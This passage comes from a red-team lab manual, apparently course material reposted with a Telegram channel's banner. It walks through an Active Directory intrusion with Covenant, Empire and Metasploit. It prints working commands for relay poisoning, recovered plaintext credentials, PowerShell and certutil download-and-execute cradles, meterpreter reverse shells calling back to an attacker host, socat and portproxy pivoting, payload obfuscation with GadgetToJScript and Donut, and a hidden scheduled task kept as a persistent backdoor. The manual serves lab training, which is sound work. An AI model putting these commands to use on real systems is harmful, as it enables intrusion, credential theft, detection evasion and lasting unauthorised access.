(Empire: powershell/collection/inveigh) > set

HTTPResponse

<html><head><meta http-equiv='refresh'
content='0;
url=http://10.100.11.101'></head></html>

(Empire: powershell/collection/inveigh) > set

RunTime 10

(Empire: powershell/collection/inveigh) > execute

You should start to see poisoned answers. In the

meantime, inspect your Metasploit console in
order to see if the relay server successfully
relays the captured authentication attempts to
the identified website and stores the responses
into the MSF DB.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

By using the command "notes" in Metasploit we can

see any data stored in database.

It looks like the relayed authentication attempts

worked against the website's authentication.

You can find some database and privileged user

credentials there:

DataBase
Credentials</p></td><td><b>sa:Cr@zyCompl3xP@ssw0r
d</b> and

ELS-CHILD\uatoperator:Cr@zyCompl3xP@ssw0rd

Lateral movement using PSRemoting

If you try aforementioned password against
ELS-CHILD\uatoperator user, you can notice they
work. Having RDP access to Jumpbox will allow you
to run a new powershell window as uatoperator
using command

runas /user:ELS-CHILD\uatoperator powershell.exe

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Then you can join that machine to Covenant by

pasting the launcher to that powershell window.

As you check information about uatoperator, you

can see that he is a member of the powershell
remoting group. We can try to abuse that fact in
order to execute code on the domain controller.

We can try executing code on the DC, as follows:

powershell invoke-command -computername

child-dc01 -scriptblock {hostname}

Seeing that, we can try to execute another grunt

using the command.

powershell invoke-command -computername

child-dc01 -scriptblock {iex (new-object

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

net.webclient).downloadstring('http://10.100.10.2
/1.ps1')}

We can see a new grunt being spawned.

WMI Launcher
Another lateral movement method is by using a WMI
Launcher.

Let's go to our current high integrity grunt and

create new Task named WMIGrunt. Our starting
point is High integrity grunt running as
ELS\VICTIM on Jumpbox. The task is run with
following options:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You need to supply the target computer hostname.

The result will be a new grunt connection spawned
from that computer.

Passing session to Metasploit

We previously talked about passing sessions to
Metasploit. This can be useful for example for
the purpose of Pivoting. We will talk about this
again but this time through shellcode injection
and Covenant. You can perform that exercise on
any machine - preferably jumpbox or win10-web
where you have the possibility to debug the
Metasploit payload through RDP.

Let's spawn msfconsole on attacker machine and

configure the listener:

We use "setg" instead of "set" because that

allows to setup up the variable globally for
Metasploit instead just for current module.

msf5 exploit(multi/handler) > use

exploit/multi/handler

msf5 exploit(multi/handler) > setg payload

windows/x64/meterpreter/reverse_https

msf5 exploit(multi/handler) > setg lhost

10.100.10.2

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

msf5 exploit(multi/handler) > setg lport 9090

msf5 exploit(multi/handler) > setg exitfunc

thread

msf5 exploit(multi/handler) > setg exitonsession

false

msf5 exploit(multi/handler) > run -j

Next step will be to generate a meterpreter

stager with the same settings. Thank to setg
utility, we were able to do it without additional
settings.

In a separate terminal, issue the command:

xxd -ps /tmp/sc.bin | tr -d "\n"

The output of that command will be used for

direct shellcode injection using Covenant.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You can see that the session was opened.

Attacking SQL Server

SQL servers can be commonly found within an
Active Directory domain. They have quite some
attack surface, as they can be subject to various
misconfigurations. Let's explore further how SQL
servers can be approached within a domain using
Covenant and PowerUpSQL. The latter can be
downloaded from its github repository:

https://github.com/NetSPI/PowerUpSQL/

Upon downloading, you can transfer its components

into your attacker's machine.

Next, we will use Covenant to Import

PowerUpSQL.ps1 using the PowerShellImport task.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As we now go to the Interact tab, we can now

issue cmdlets imported from PowerUpSQL.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Using the command Get-SQLInstanceDomain a SQL

server within the domain has been identified. We
can now prepare to attack it.

You can also try to identify more SQL servers

using commands such as:

Note, that this does not mean that all these

servers are active and accessible. For example,
the first method that gave us some results is
based on SPNs in the domain. If PowerUpSQL finds
a SPN related to MSSQLSvc, it lists that server.
However, it is possible that a SPN for a
non-existent or decommissioned SQL server is
present.

You can also pipe the result of the above command

to Get-SQLInstanceTestThreaded in order to get
accessible databases from within the server. Note
that we use another pipe to Format-List in order
to prevent truncating the output.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We can see that only the UATSERVER machine is

displayed as "Accessible".

Due to that, let's focus on that machine.

We will now try to target the SQL server. In that

scenario we are starting with a medium integrity
grunt on jumpbox machine. Powershell is imported
and UATserver is enumerated using PowerUpSQL.

As we execute ping from our attacking machine, we

can see that we cannot directly access that
machine from our network. We would need some kind
of pivoting.

We will use socat to relay our traffic and be

able to hit the remote SQL server from our local

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

windows machine. First, download socat for

windows.

https://netcologne.dl.sourceforge.net/project/uni
x-utils/socat/1.7.3.2/socat-1.7.3.2-1-x86_64.zip

The downside of using the above is that it

utilizes multiple dll libraries, so you will need
to transfer all of them to the remote machine. If
you prefer to have it compiled statically, you
will need to do some coding and patching
yourself.

We will use the ready version and move all the

libraries to the target machine using the Upload
task.

We need to transfer the .exe as well as its dll

libraries.

Note:

In case a newer powershell version is used you

would also be able to use the Expand-Archive
cmdlet - first, to upload only the .zip file and
then simply unpack it. Unfortunately, our victim
machine does not have this possibility.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Finally, we can run socat. Knowing the IP of the

SQL server instance (10.100.11.150) obtained by
resolving its hostname using ping, we can set up
a relay.

Note that we gave you a link to the latest socat

version (1.7.3 at the time of writing that).

This is important, because the syntax has

changed. You can see the latest socat syntax at

https://fossies.org/linux/socat/CHANGES

or by running the binary with a command line

argument socat.exe -h

First, we will create a relay on the remote

victim machine.

powershell .\socat.exe
tcp-listen:1433,tcp-connect:10.100.11.150:1433

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The reason we use powershell is because with

usual "shell" the covenant Task breaks and socat
does not work in the intended way.

Currently we have a relay to the SQL server

machine. We will also create a relay from our
kali to the victim machine, so we can connect a
local SQL client to the remote SQL server.

It will go in a way

Local SQL Client -> Kali -> Socat -> Jumpbox ->
Socat -> UATSERVER

On our Kali machine we type

socat tcp-l:1433,fork tcp:10.100.10.250:1433

As SQL Client we will use HeidiSQL. It can be

downloaded from

https://www.heidisql.com/

You can use the database credentials obtained

from a previous exercise. Note that we use a
local Windows VM where HeidiSQL is installed.

Username: sa

Password: Cr@zyCompl3xP@ssw0rd

By pointing the HeidiSQL Client to the first

relay in kali we can reach the uatserver on its
end.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You can then interact with SQL Server from the

HeidiSQL Console.

We can also check if we have the possibility to

execute commands on the underlying DB.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

In order to transfer files from the attacker

machine, you might want to set up a socat relay
towards the reverse direction:

powershell .\socat.exe
tcp-listen:8080,tcp-connect:10.100.10.2:80

Note that the socat for windows might break. To

make sure that your socat instances are still
present, you can check through the command:

powershell tasklist | findstr socat

If you are looking for a writable directory you

might want to examine

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

C:\MSSQLDB$\exception\

This is because applocker is in place and you

might not be allowed to upload to other places.

Also, we will check the current user.

Using the SQL console we can also view database

links.

Database links allow to connect to additional

data sources. They do not have to be SQL servers
(even Excel sheets can be linked to databases)
however, most of the times you will be able to
find more SQL dbs.

SELECT * FROM master..sysservers

Allows to return database links of the current

database.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We can follow the links down and also query each

of the datasources for its servers. In that case,
there are no more physical machines.

PowerUpSQL also offers the possibility of

automated DB link crawling.

SMB Grunts

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Another type of grunt you might want to utilize

is SMBGrunt. SMBGrunt communicates with another
HTTPGrunt using SMB Named Pipes, which makes it
stealthier but also can allow you to bypass
network restrictions without pivoting. The
architecture of SMBGrunts is as follows:

Attacker Machine (c2) -> HTTPGrunt -> SMBGrunt

In order to create such an architecture, we will

need to perform attacks steps in a certain order.

In this exercise we will use jumpbox and

win10-web machines with a high integrity grunt -
e.g. of ELS-CHILD\victim user.

First, let's be sure that we have our listener up

and ready for the lab infrastructure. We need to
assign the proper IP address to it (this of the
VPN interface).

If you want to change the listening port and you

are using Covenant from Docker, you would need to
rebuild your docker container with the new ports
exposed. We are using port 80 as usual.

But first, let's create a SMBGrunt launcher. Go

to Launchers and choose PowerShell

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The template is changed to GruntSMB and

SMBPipeName is changed to grunt_smb (to avoid
using the default one)

Next, click "generate" and host it as "smb.ps1"

The new payload string should appear.

We will download the smbgrunt to Jumpbox. If

everything was successful, you should see the
below.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

So far, nothing happens and there are no new

grunts.

Let's go to Grunts, choose the active win10-web

grunt and choose "Interact"

Use the below syntax:

connect computername pipename

Note that we are now working in the security

context of a domain user. If that wasn't the case
we would not be able to connect to that named
pipe, due to an authorization requirement.

You can now see that a new SMBGrunt has been

spawned.

In the next task you will make use of that SMB

Grunt.

Pivoting using Portproxy and SMBGrunts

One of methods to interact with a foreign network
is the aforementioned usage of socat. You can
manually set up a number of relays that will
tunnel your traffic back and forth.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As we have already mentioned socat may not be the

most reliable pivoting solution though. Another
way is to perform classic pivoting using
Metasploit and meterpreter.

More persistent pivoting can be achieved through

Metasploit's portproxy module.

In order to utilize that technique, you will need

to hook the target server with a meterpreter
payload of choice. You can do it using the
aforementioned hex payload injection technique or
in a traditional way - downloading and executing
a payload.

First we generate a PowerShell-based meterpreter.

msfvenom -p windows/x64/meterpreter_reverse_https
-f psh -o msf.ps1 lhost=10.100.10.2 lport=8443
exitfunc=thread

It is being hosted on port 8888.

A meterpreter handler is prepared:

msf5 exploit(multi/handler) > set payload

windows/x64/meterpreter_reverse_https

msf5 exploit(multi/handler) > set lhost

10.100.10.2

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

msf5 exploit(multi/handler) > set lport 8443

msf5 exploit(multi/handler) > run

We also command the Grunt to download and execute

the payload:

powershell "iex (new-object

net.webclient).downloadstring('http://10.100.10.2
:8888/msf.ps1')"

As the payload is executed, a meterpreter session

is achieved.

We can now try to create portproxy paths to

another machine. As an example, we will create a
portproxy path in order to create a SMB Grunt on
the UATSERVER machine.

First, we create a listener. Note that at the

time of writing, Covenant does not feature
pivoting on its own, so we are creating a
workaround.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Our pivot point has two IP addresses

We will bind our Listener to our kali ip address

but set the "Connect address" to the second
network interface. This is equivalent of "LHOST"
in covenant's implant.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now, in Metasploit we will forward that port to

our listener. Note that you might want to expose
port 9080 additionally on the docker instance if
you are using Covenant from Docker. The process
of exposing a port has already been shown.

As such launcher is created, we go to the

listener menu, choose 9080 and "Download" the
file. It is automatically being saved under name
"35"

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Next, we add another rule to portproxy module in

order to expose the launcher.

msf5 post(windows/manage/portproxy) > set

LOCAL_ADDRESS 10.100.10.250

msf5 post(windows/manage/portproxy) > set

LOCAL_PORT 8888

msf5 post(windows/manage/portproxy) > set

CONNECT_ADDRESS 10.100.10.2

msf5 post(windows/manage/portproxy) > set

CONNECT_PORT 8888

msf5 post(windows/manage/portproxy) > set session

1

msf5 post(windows/manage/portproxy) > run

We can now execute the download on UATSERVER. It

can be done using xp_cmdshell or powershell
directly, using command:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

iex (new-object
net.webclient).downloadstring('http://10.100.10.2
50:8888/35')

The file is being downloaded.

After a while, you can command jumpbox to connect

to uatserver's newly created pipe in order to
activate the SMBGrunt.

After a short period of staging, the smbgrunt

should appear in your Grunts list.

If you would like to clear the portproxy rules

you created, issue the below command

netsh interface portproxy reset

Direct pivoting with portproxy and Covenant

In the below exercise we will utilize
Metasploit's portproxy in order to pivot a HTTP
listener from different network towards our HTTP
Listener.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Be sure that the listener port is exposed out of

docker in case you are using the docker release.

First, we create a listener.

It will be bound to our local Kali instance but

its connect address will be this of the Jumpbox
machine. This way, once a launcher connected with
that one will be created and run, it will try to
reach 10.100.11.250 on port 9080.

In order to prepare that port, we will also

create a portproxy rule on jumpbox server.

First, we will hook Jumpbox with meterpreter. Any

payload delivery technique is fine. We simply
generated a msfvenom payload and saved it to
Kali.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As soon as meterpreter's session is established,

the portproxy module is used with two rules.

msf5 exploit(multi/handler) > use

post/windows/manage/portproxy

msf5 post(windows/manage/portproxy) > set

CONNECT_ADDRESS 10.100.10.2

msf5 post(windows/manage/portproxy) > set

CONNECT_PORT 9080

msf5 post(windows/manage/portproxy) > set

LOCAL_ADDRESS 10.100.11.250

msf5 post(windows/manage/portproxy) > set

LOCAL_PORT 9080

msf5 post(windows/manage/portproxy) > set session

1

msf5 post(windows/manage/portproxy) > run

msf5 post(windows/manage/portproxy) > set

LOCAL_PORT 9000

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

msf5 post(windows/manage/portproxy) > set

LOCAL_ADDRESS 10.100.11.250

msf5 post(windows/manage/portproxy) > set

CONNECT_PORT 9000

msf5 post(windows/manage/portproxy) > set

CONNECT_ADDRESS 10.100.10.2

msf5 post(windows/manage/portproxy) > set session

1

msf5 post(windows/manage/portproxy) > run

We have now opened two paths and both lead from

jumpbox machine to our Kali machine. One on port
9080 which will be used for the listener and one
on port 9000 which will be used to download the
payload.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now, we can go to Launchers, choose PowerShell

and choose Listener "10.100.11.250". Then,
Download it.

The downloaded file is renamed, in our case, to

11.ps1.

It is moved to a directory where Python Simple

Server listens on port 9000.

Port 9000 is exposed also on Jumpbox. The last

part will involve downloading and executing the
file from UATSERVER which is in a different
network.

Now, use any code execution technique on

UATSERVER to download an execute the powershell
payload.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You can do this from the compromised SQL server

or via an RDP session if you would like to debug
it more closely. You can try either

C:\MSSQLDB$\exception directory or
C:\windows\tracing which is a world-writable
location by default.

We use the commands:

EXEC xp_cmdshell 'powershell curl

http://10.100.11.250:9000/11.ps1 -outfile
c:\windows\tracing\11.ps1';

EXEC xp_cmdshell 'powershell

c:\windows\tracing\11.ps1';

or

powershell curl
<http://10.100.11.250:9000/11.ps1>

.\11.ps1

In a short while, we can see that a UATSERVER

grunt will appear.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We can now go to the "interact" tab and issue

commands. For example, ipconfig allows us to be
sure that we are interacting with a computer in a
completely different network.

Using Covenant launchers with Gadget to

Jscript
Note: this task should be (at least partially)
performed on a local machine. Later on, you can
try to upload the compiled launcher to
win10-web.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As we already mentioned, Covenant launchers can

be also exported into the form of .NET code,
which can be for further obfuscated or modified.
In this exercise we will connect with the
win10-web machine of the lab in order to download
and execute the obfuscated launcher code.

We will start with a local machine where we can

compile the GadgetToJScript tool using Visual
Studio 2017. The tool has been initially released
in 2017 by James Forshaw, and has recently been
refreshed for red-teaming purposes. You can find
the refreshed tool here:

https://github.com/rasta-mouse/GadgetToJScript

Download the archive and open the .sln file in

Visual Studio. It already has a reference to a
TestClass.cs

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The TestClass.cs is being compiled into a DLL

which we will not use but the file itself will be
used with the GadgetToJScript payload generator.

Let's go to our Covenant instance and choose

"Binary" launcher. Then, we go to "Code" and copy
it.

Let's paste the code into Visual Studio

TestClass.cs

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now, we set the project to "Release" and "x86"

and build it.

We can disregard the dll file for now. Let' go to

the GadgetToJScript directory and execute it with
the following parameters:

https://assets.ine.com/cybersecurity-lab-images/3
6c9cc04-7663-45bf-9c9b-78ec1c3f139e/image323.png

GadgetToJScript.exe -i
.\..\..\..\..\TestPayload\TestClass.cs -r
System.Core.dll -w vbs -o
c:\users\win10en\Desktop\vbs1

The -I specifies the input file to be obfuscated.

-r allows to specify additional assembly
references -w specifies the output format (hta,
vbs, wsh or js) and -o specifies the output
filename without an extension.

In that case, we generated vbs1.vbs. Let's

transfer it to win10-web and execute it. We can
access the command line from the compromised

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

machine using Remote Desktop. The following

command can be used to download vbs1:

certutil.exe -urlcache -split -f

http://10.100.10.2:9000/vbs1.vbs vbs1.vbs

wscript.exe vbs1.vbs

We can see that a new grunt has been activated.

We will now add another layer of obfuscation to

the grunt stager. Let's start once again with
generating a Binary launcher. This time, we want
to download the .exe Grunt Stager. We will
obfuscate it using Donut. Donut is a .NET
shellcode generation tool and it can be
downloaded (as pre-built release) from here:

https://github.com/TheWover/donut/releases

We named our Grunt Stager gs.exe and used its

name as an argument to the donut command.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

In the next step, we will convert the shellcode

to base64 using PowerShell's native
functionality:

$f = "C:\Users\win10en\Desktop\donut_v0.9.3
(3)\loader.bin"

[Convert]::ToBase64String([IO.File]::ReadAllBytes
($f)) > b64.txt

Now, let's reopen the project we used to compile

Gadget to Jscript or the TestClass.cs alone (we
recommend using visual studio, it will highlight
potential syntax errors related to extra
characters that might break your payload)

Delete the entire class TestClass.cs and paste

the Process Injection PoC that can be found on
the below github gist. The PoC will spawn notepad
and inject shellcode to it. This adds another
layer of obfuscation to our Grunt Stager.

https://gist.githubusercontent.com/3xpl01tc0d3r/e
cf5e1ac09935c674a9c6939c694da13/raw/238ed3339a458
ce0260f98dc18a38fdbed420457/Payload.txt

Then, navigate to the shellcode placeholder and

paste the content of b64.txt

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now you can run GadgetToJScript as previously in

order to compile a scriptlet executable out of
the TestClass.cs:

.\GadgetToJScript.exe -i
.\..\..\..\..\TestPayload\TestClass.cs -r
System.Core.dll -w vbs -o
c:\users\win10en\Desktop\vq

We can again transfer it to Win10-web using

certutil as previously:

certutil.exe -urlcache -split -f

http://10.100.10.2:9000/vq.vbs vq.vbs

wscript.exe vq.vbs

We can observe a new grunt being spawned.

LOCAL TASKS
These tasks are to be performed on a local
windows VM since they are non-domain specific.
However, they can still be performed within a
domain environment so you can try them within the
lab at a later time.

Local Persistence

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Note: this task is designed to be executed

locally, but you can try to perform it in the
lab.

Covenant also offers persistence methods to

maintain access to a victim machine. Obviously,
your shell is not persistent and might be lost
due to various reasons like a reboot or a logout.
This is something that we can't allow to happen -
especially when a grunt is the outcome of a
thoroughly prepared phishing campaign which cost
a lot of time and effort.

Persistence can be achieved in the context of a

current user or an elevated party like local
system. Of course, a lower privilege level means
lower capabilities but also a lower detection
possibility, and higher capabilities associated
with local system persistence are more likely to
be detected.

For user-land persistence, you might consider

techniques like:

● Scheduled tasks

● Autorun (Registry)

● Startup folder

● COM and DLL Hijacking

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Covenant already has some built-in persistence

modules associated with SharpSploit. However,
let's try to execute custom Task Scheduled
persistence using Covenant.

First, let's create a script on the Attacker

machine:

function New-ScheduledTaskPersistence {

$TaskName = "Persistence"

$Trigger = New-ScheduledTaskTrigger

-Daily

-At 09:00

$Action = New-ScheduledTaskAction

-Execute
"C:\Windows\System32\WindowsPowerShell\v1.0\power
shell.exe"

-Argument "-Sta -Nop -Window Hidden

-EncodedCommand [PAYLOAD OF THE BACKDOOR]"

-WorkingDirectory "C:\Windows\System32"

Register-ScheduledTask

-TaskName $TaskName

-Trigger $Trigger

-Action $Action

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

